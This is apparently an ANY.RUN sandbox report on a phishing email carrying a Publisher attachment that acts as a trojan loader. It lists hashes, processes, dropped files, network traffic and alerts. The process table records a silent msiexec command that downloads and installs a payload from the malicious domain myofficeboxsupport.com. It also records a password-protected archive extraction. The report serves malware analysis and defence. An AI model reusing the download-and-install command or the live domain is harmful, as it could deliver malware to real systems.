analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

{Spam } Cheque copy.msg

Full analysis: https://app.any.run/tasks/f7798036-f76e-465c-a864-570a40eee0c5
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: November 08, 2018, 11:25:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
loader
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

0CA09181C5DF741DC5D688EBA8394BCF

SHA1:

BF1534020B0444E1ACC8D13CC079F31AD822F7E7

SHA256:

7021454E432ECB52C3E7C7D849E88CFF4FD404973021EC31737B30619520C18D

SSDEEP:

1536:LRmcA7sv0QE4LMECLOns3D2x8S5GxvSt3y+sMjY:tmcA7st0/Kt35rj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • OUTLOOK.EXE (PID: 2004)

    • Loads the Task Scheduler COM API

      • MSPUB.EXE (PID: 3496)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 4092)

    • Application was dropped or rewritten from another process

      • shsvcs.exe (PID: 3100)
      • btc.exe (PID: 3108)
      • exit.exe (PID: 896)
      • exit.exe (PID: 2116)
      • winserv.exe (PID: 280)

    • Loads dropped or rewritten executable

      • cmd.exe (PID: 3072)

    • Changes the autorun value in the registry

      • reg.exe (PID: 3996)

  • SUSPICIOUS

    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 2004)
      • MSPUB.EXE (PID: 3496)
      • winserv.exe (PID: 280)

    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 2004)

    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 2004)
      • MSPUB.EXE (PID: 3496)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 4092)
      • shsvcs.exe (PID: 3100)
      • cmd.exe (PID: 3072)
      • btc.exe (PID: 3108)

    • Starts CMD.EXE for commands execution

      • exit.exe (PID: 896)
      • exit.exe (PID: 2116)

    • Creates files in the program directory

      • btc.exe (PID: 3108)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3952)

    • Reads the machine GUID from the registry

      • winserv.exe (PID: 280)

    • Reads Windows Product ID

      • winserv.exe (PID: 280)

    • Connects to unusual port

      • winserv.exe (PID: 280)

    • Reads Environment values

      • winserv.exe (PID: 280)

    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 3952)

  • INFO

    • Reads Microsoft Office registry keys

      • OUTLOOK.EXE (PID: 2004)
      • MSPUB.EXE (PID: 3496)

    • Reads settings of System Certificates

      • MSPUB.EXE (PID: 3496)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 4092)

    • Creates a software uninstall entry

      • msiexec.exe (PID: 4092)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.pub | Microsoft Publisher document (38.5)
.msg | Outlook Message (36.2)
.oft | Outlook Form Template (21.1)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
68
Monitored processes
33
Malicious processes
4
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start outlook.exe mspub.exe msiexec.exe no specs msiexec.exe shsvcs.exe exit.exe no specs cmd.exe ping.exe no specs ping.exe no specs btc.exe exit.exe no specs cmd.exe no specs reg.exe winserv.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2004"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\{Spam } Cheque copy.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
3496"C:\Program Files\Microsoft Office\Office14\MSPUB.EXE" C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\SN3C14WF\cheque.pubC:\Program Files\Microsoft Office\Office14\MSPUB.EXE
OUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Publisher
Version:
14.0.6026.1000
3076C:\Windows\System32\msiexec.exe urk=google url=com /q /norestart /i http://myofficeboxsupport.com/shsvcsC:\Windows\System32\msiexec.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
4092C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3100"C:\Users\admin\AppData\Local\Temp\Data1\shsvcs.exe"C:\Users\admin\AppData\Local\Temp\Data1\shsvcs.exe
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
896"C:\Users\admin\AppData\Local\Temp\exit.exe" C:\Users\admin\AppData\Local\Temp\exit.exeshsvcs.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Wiskas
Exit code:
0
Version:
1.0.0.0
3072cmd /c i.cmdC:\Windows\system32\cmd.exe
exit.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2540ping yandex.com -n 3 -w 6000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3728ping yandex.com -n 3 -w 6000C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3108btc.exe x -p3KPnoNJ3ReME4bEU5W9APkKS5ErkR3tNRT -yC:\Users\admin\AppData\Local\Temp\btc.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
3 687
Read events
2 767
Write events
0
Delete events
0

Modification events

No data
Executable files
8
Suspicious files
5
Text files
41
Unknown types
9

Dropped files

PID
Process
Filename
Type
2004OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR9E00.tmp.cvr
MD5:
SHA256:
2004OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\SN3C14WF\cheque (2).pub\:Zone.Identifier:$DATA
MD5:
SHA256:
3496MSPUB.EXEC:\Users\admin\AppData\Local\Temp\CVRCE48.tmp.cvr
MD5:
SHA256:
3496MSPUB.EXEC:\Users\admin\AppData\Local\Temp\~DFB6ED656CF03E70EB.TMP
MD5:
SHA256:
3496MSPUB.EXEC:\Users\admin\AppData\Local\Temp\~DFB435AFA81902E435.TMP
MD5:
SHA256:
3496MSPUB.EXEC:\Users\admin\AppData\Local\Temp\~DF52649FB5EC47B25A.TMP
MD5:
SHA256:
3496MSPUB.EXEC:\Users\admin\AppData\Local\Temp\~DF83D92A6D134C8BEA.TMP
MD5:
SHA256:
3496MSPUB.EXEC:\Users\admin\AppData\Local\Temp\~DFEE4C34B67C76752F.TMP
MD5:
SHA256:
2004OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED89624D.datimage
MD5:8F6DA6F17D265FA40171F858148ED756
SHA256:CA990C359519F458F7D390526E5080A86840C570B1ED3E5E81293BE78ADDD512
2004OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F02C47C.datimage
MD5:802C0CADE8CEB699995334FABDF4BB9F
SHA256:DEC72DFFFBBB14A17B2CE3C07CD10956BD9E1379D46AB69EB680EC52ABF3CDDF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2004
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3496
MSPUB.EXE
GET
200
52.109.32.27:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={CD0D7B29-89E7-49C5-8EE1-5D858EFF2593}&build=14.0.6023
GB
xml
1.99 Kb
whitelisted
4092
msiexec.exe
GET
200
185.92.74.209:80
http://myofficeboxsupport.com/shsvcs
NL
executable
3.57 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2004
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
3496
MSPUB.EXE
52.109.32.27:80
office14client.microsoft.com
Microsoft Corporation
GB
whitelisted
4092
msiexec.exe
185.92.74.209:80
myofficeboxsupport.com
Foxcloud Llp
NL
malicious
280
winserv.exe
89.144.25.16:5655
GHOSTnet GmbH
DE
suspicious
3496
MSPUB.EXE
52.109.88.49:443
office.microsoft.com
Microsoft Corporation
NL
whitelisted

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
office14client.microsoft.com
  • 52.109.32.27
whitelisted
office.microsoft.com
  • 52.109.88.49
whitelisted
myofficeboxsupport.com
  • 185.92.74.209
malicious
yandex.com
  • 213.180.204.62
whitelisted

Threats

PID
Process
Class
Message
4092
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
4092
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
1 ETPRO signatures available at the full report
Process
Message
winserv.exe
Error WTSQueryUserToken #1314
winserv.exe
08-11-2018_11:27:11:551#T:Error #20 @2
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
{Spam } Cheque copy.msg